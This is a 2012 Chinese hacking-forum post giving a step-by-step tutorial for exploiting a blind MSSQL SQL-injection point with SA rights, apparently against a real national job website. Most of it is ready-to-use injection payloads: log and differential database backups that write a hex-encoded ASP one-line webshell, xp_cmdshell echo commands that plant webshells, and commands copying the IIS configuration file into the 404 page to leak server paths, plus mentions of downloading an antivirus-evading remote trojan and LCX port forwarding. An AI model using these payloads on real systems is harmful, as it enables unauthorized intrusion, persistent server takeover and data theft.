找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2123|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————! p/ u" w2 g$ F& }
4 b& o6 X! P0 B, s& v  X: Y- |6 D

& H3 S$ g  K# y. _) k4 q0 b                                                             欢迎高手访问指导,欢迎新手朋友交流学习。8 U$ e: I8 e2 T7 P

& O: S( W9 q; Y8 d: G6 v                                                                 
" @+ i0 l5 }. _; x6 [% _+ g' P& N. L" L                                                                 
3 z( b! o" d3 A7 t                                                                  论坛: http://www.90team.net/$ O8 K( T7 f  z; B2 y
" `4 {' V" Q" G' ]
+ e: A* M* H& C* [5 `% R$ v- W8 d

; U; c0 L3 [& W; Z友情检测国家人才网2 }" U5 l1 [, q

1 u% y+ X# {" A) ~, m8 z* i! u+ I+ V" O4 Z; i2 |% F
内容:MSSQL注入SA权限不显错模式下的入侵, X; B/ C$ m; D% ~! V

( n! ], j6 r  x: j4 L
8 s2 ~* {+ q  T. l一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。$ d) g! Z- E1 Q# t8 t
/ \9 t& j# c" J% O- x1 N8 T
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
) `* j/ a" k1 @( M, h% j
% x4 `9 o& U1 O3 o" @# o
9 }5 U5 G) [/ P. J: [2 q% q1 r这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
8 x& o# |. A: f: {$ X& q! D* b6 m) o5 h5 {8 H3 V: w8 S
思路:) {# `3 u& p- k

+ X* z& H6 x; `8 O$ ~首先:) K+ \: Z; s0 b5 ]! p% u& ]$ T
3 X7 B% i6 _7 |+ \
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。8 f$ j" i) h$ e4 l9 e* Q
& D: Q. _9 R4 c- t
1.日志备份获得Webshell  n. e6 Q  I4 o
7 L# i% B/ |5 o' S. d$ _% ^2 ^* U3 }
2.数据库差异备份获得Webshell$ T4 S6 R) ?5 x3 Y, s' y1 @
4 w: a3 @4 i' @( i6 T) Q5 I* m1 G
4.直接下载免杀远控木马。
. ^2 t3 a  H3 s+ I0 d5 ~  Z1 t0 z) v  E" \
5.直接下载LCX将服务器端口转发出来
8 m3 b# Y* p0 w. [# l3 n" O6 W* U; _2 q; S0 z
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。( I4 `- m! ~& c/ R5 ~( w, _( }

9 s3 ?0 O: T2 v; D  s$ B
2 o% {- V0 o8 l7 d7 n9 q+ |+ w: b8 d! L2 ^
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
  W; U: W6 S, z1 i, W8 ]5 j- M6 S1 n8 X( z$ X
我直接演示后面一个方法
# b3 W9 ?3 \; {6 r% L# H2 _- l! m; S! g) d

1 I+ S' T& F3 d% F6 y: G% B分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL / g) T. y. X0 a+ }4 S

" y. m4 C+ K; `+ A
0 W; i( d8 M- M" C1 G0 U  U6 B5 n
( g3 o4 _# N( I
◆日志备份:! C# F8 x7 ?3 m1 s; ^: p

7 N& q$ W" f* l" A& \4 E# {/ M- ?  _, n8 O
1. 进行初始备份
! L6 U7 @3 v* Y; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--! R% m+ x. W( |& h3 ~3 T3 i  v

( D$ w6 b7 e( l2. 插入数据6 L! m) Q) a1 p$ X; h( Z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
; E. B* n; w3 f6 m7 U
6 y: L* v9 N( k$ ?3 b( ]% C0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%># b- m% {0 K# r; {" C' |5 K! g
  
/ p) z; G8 y" v3. 备份并获得文件,删除临时表  g6 Z  V# b8 T7 Y
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
# K3 D4 b2 D& n/ p0 x" S% B. L9 L$ B6 s; Y$ a

( I) O& R1 _" z# r' d
3 T7 V0 t7 m/ \4 W  b9 A* P◆数据库差异备份  W; C! R& R  l$ [. U5 V1 g
/ {8 r$ W$ S+ P0 ^0 d
(1. 进行差异备份准备工作; X! d: G2 q$ z# M: S
# t- F/ `( z$ P5 I8 K( Y6 b" S
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
8 ?, O2 K* m* h, I( h
% h0 f" ?. \. r4 }  q3 i# Z上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
( y) K! E! W8 y/ B7 G ; T' ^7 \+ s& H; F
( g8 V, m& s7 Y9 x
(2. 将数据写入到数据库( a" [6 i. H$ ?" n) H
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
( d& _& T) s5 M3 g; W
7 u& q# B' I% l" B, z* n' @8 e0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>/ z! K4 _: n: X

4 U& c  B  X9 j2 i' U+ B# u3. 备份数据库并清理临时文件
" R$ W8 g" W, p6 S: C! |' @+ i. w+ A) M0 [1 }+ c, S
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--" s6 G# y  c3 o, Q, U3 z: S) h
) @( O0 X. G2 |: ^
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 . t9 R+ ^7 \* f; z/ u
: T; ?3 G6 ~. o

  v5 R% I, n0 s' `. C7 w- g( |6 P; ]. I1 G( r' c4 _, |
用^转义字符来写ASP(一句话木马)文件的方法:   
* {) Y0 H  d- p. @
6 u1 x9 o3 @0 \. Y1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--' M. [8 Y3 o7 l8 _) i2 C! R

7 _) \3 R5 D; B; b9 }0 m2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
$ O* ]9 i/ W: A" f& p! H
: Q  q; Y% u8 g6 q读取IIS配置信息获取web路径
0 e$ p5 R0 F4 L0 \2 t1 v, w% x" ?$ A9 q% X) e9 C) z7 r
     4 t7 L* H0 N' o  Z4 X
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--/ F- l/ a7 O; G" L4 g7 `
1 h3 F' G% P4 t9 M
执行命令
/ a4 X2 G2 A( U! ?; q; K) ?     : L( B/ j, y3 W+ O' R
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--. {7 z  ^' S1 e: L# X! l
" `6 ?5 E% E! b2 E+ l" W

- D( D+ ^2 O+ D
  z, u) c& P% S" Q1 b* G  @. y, H4 b: S0 T9 A
- V: H- `8 \- |- Y4 B" |' s4 g0 H

; j- a; d/ H7 k' C. B8 v6 s6 l
8 k: A) i3 E; N; h3 h* a$ }
* U  z4 Q: }# n) T; t+ Y9 Z# M4 X/ }, _" T6 |, ~$ J  ^

: c2 r- |5 @* T' U9 X' f  J/ @+ D6 D" y+ H9 q' A
2 M7 D/ ?& p( `# w  Z2 B3 r3 V9 B

2 [0 d2 P( P% }8 s9 P! z% @. ?+ q0 x$ F9 x8 Q0 \

" E9 M" S' b, ]) l
$ o" v( n% d: Q. d7 C- O8 P1 Q7 s4 h& g9 s  }2 A" N) Q% L
# A& q- ^; k+ U( p
/ m8 [& H+ \" h1 T% _/ m/ Q
7 Y! C5 `' q5 t* E- D% P5 E6 s

3 K1 E( c# c' s  z, F
+ u) T+ _. Z# L' R- |2 A
) @5 H. {' l1 B. z$ Q' k) K2 ]" q1 b1 C1 a
  u6 S6 z" k+ z) y

% F) A. H& v$ k7 D% u6 L& m4 G4 s% M- R
+ _3 @4 ~! r# N0 {
, s" P' O* T$ M& R. V( e7 e. C
; m( t: S( C. k. ?
5 P/ L3 H% L  }2 B( O

6 L# |( p0 H+ g, O% P7 E" Z& Q  G& r9 |$ u# b4 N
0 ~! c6 |- c( e; u
" m' `$ D) Y% ^, e
% j. J7 Y6 [3 ~2 }; W

8 m/ I( J( }9 o$ c4 g/ B. v5 V, m0 l; a5 ^
6 K+ _0 |; G+ s/ }! @5 g5 l# D

! X1 ]/ a" |& ?; S7 \3 w9 I8 v' Y1 d6 `" P3 ^
/ }: T# @5 p* L0 \9 b3 e
( A: R8 y, o" |$ d7 y
4 H* j; [* X7 h4 a
$ N3 {; T4 Z: j3 Y7 W

& \0 i' q5 r; E3 b
' [0 D" w2 K, z+ ~: j! H
  g$ S, |# |4 \5 h! o8 m5 `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表